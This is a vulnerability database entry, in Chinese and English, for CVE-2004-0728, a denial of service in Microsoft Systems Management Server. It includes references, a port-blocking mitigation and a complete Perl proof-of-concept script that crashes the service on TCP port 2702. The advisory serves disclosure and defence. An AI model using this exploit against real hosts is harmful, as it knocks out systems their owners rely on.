CVE-2004-0728
CVSS5.0
发布时间 :2004-07-27 00:00:00
修订时间 :2016-10-17 22:48:18
NMCOE    

[原文]The Remote Control Client service in Microsoft's Systems Management Server (SMS) 2.50.2726.0 allows remote attackers to cause a denial of service (crash) via a data packet to TCP port 2702 that causes the server to read or write to an invalid memory address.


[CNNVD]Microsoft Systems Management Server远程拒绝服务漏洞(CNNVD-200407-046)

        
        Microsoft Systems Management Server是Windows系统配置管理解决方案。
        Microsoft Systems Management Server在处理部分异常包通信时处理不正确,远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。
        SMS远程控制客户端服务监听TCP 2701和2702,服务执行签名检查和对接收到的数据进行大小测试,如果构建一包通过基本检查,但可使服务读或写非法内存地址而发生异常,就可以对服务进行拒绝服务攻击。当服务使用带非法参数的API调用时可在multprot.dll库中发生异常。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:systems_management_server:1.2:sp3Microsoft systems_management_srv 1.2 sp3
cpe:/a:microsoft:systems_management_server:2.50.2726Microsoft Systems Management Server 2.50.2726 .0
cpe:/a:microsoft:systems_management_server:1.2Microsoft systems_management_server 1.2
cpe:/a:microsoft:systems_management_server:2.0Microsoft systems_management_server 2.0
cpe:/a:microsoft:systems_management_server:1.2:sp2Microsoft systems_management_srv 1.2 sp2
cpe:/a:microsoft:systems_management_server:2.0:sp1Microsoft systems_management_srv 2.0 sp1
cpe:/a:microsoft:systems_management_server:1.2:sp1Microsoft systems_management_srv 1.2 sp1
cpe:/a:microsoft:systems_management_server:1.2:sp4Microsoft systems_management_srv 1.2 sp4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0728
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0728
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200407-046
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=108983763710315&w=2
(UNKNOWN)  BUGTRAQ  20040714 [HV-MED] DoS in Microsoft SMS Client
http://xforce.iss.net/xforce/xfdb/16696
(VENDOR_ADVISORY)  XF  sms-remote-service-dos(16696)

- 漏洞信息

Microsoft Systems Management Server远程拒绝服务漏洞
中危 未知
2004-07-27 00:00:00 2005-10-20 00:00:00
远程  
        
        Microsoft Systems Management Server是Windows系统配置管理解决方案。
        Microsoft Systems Management Server在处理部分异常包通信时处理不正确,远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。
        SMS远程控制客户端服务监听TCP 2701和2702,服务执行签名检查和对接收到的数据进行大小测试,如果构建一包通过基本检查,但可使服务读或写非法内存地址而发生异常,就可以对服务进行拒绝服务攻击。当服务使用带非法参数的API调用时可在multprot.dll库中发生异常。
        

- 公告与补丁

        厂商补丁:
        Microsoft
        ---------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.microsoft.com/technet/security/

- 漏洞信息 (366)

MS Windows SMS 2.0 Denial of Service Exploit (EDBID:366)
windows dos
2004-07-24 Verified
0 MacDefender
N/A [点击下载]
#!/usr/bin/perl

#############################
#
# SMS DOS proof of concept and test code
#
#############################

use Socket;
use IO::Socket;

if (@ARGV != 1)
{
print "usage: $0 <host or ip>\n";
exit;
}

$host = shift(@ARGV);

$hexmsg = converthex("5243483016004000524348455858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858");

print "\nCreating socket for connection to: $host\n\n";

my $sock1 = IO::Socket::INET->new (PeerAddr => $host, PeerPort => "(2702)", Proto
=> "tcp") or die("Could not create socket: $!\n");

$sock1->autoflush(1);

print $sock1 "$hexmsg";

while (<$sock1>)
{
print;
}

print "\nPacket sent to $host (please wait) ...\n";

sleep(2);

print "Verifying status of $host ...\n";

sleep(2);

my $sock2 = IO::Socket::INET->new (PeerAddr => $host, PeerPort => '(2702)', Proto
=> 'tcp') or die("\nDOS was successful - $host is down ...\n");

print "\nAttempt was not successful. $host is still alive and responding ...\n";

close($sock1);
close($sock2);

#############################
# End main code, start subs
#############################

sub converthex
{
local ($l) = @_;
$l =~ s/([0-9a-f]{1,2})\s*/sprintf("%c",hex($1))/egi;

return $l;
}

#############################
# End code
#############################

# milw0rm.com [2004-07-24]
		

- 漏洞信息

8243
Microsoft SMS Port 2702 DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

SMS Remote Control Client contains a flaw that may allow a remote denial of service. The issue is triggered by sending the "RCH0####RCHE" string followed by a large number of characters (over 130) to TCP port 2702, and will result in loss of availability (crash) for the SMS service.

- 时间线

2004-07-14 Unknow
2004-07-14 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by restricting access to ports 2701/TCP and 2702/TCP.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站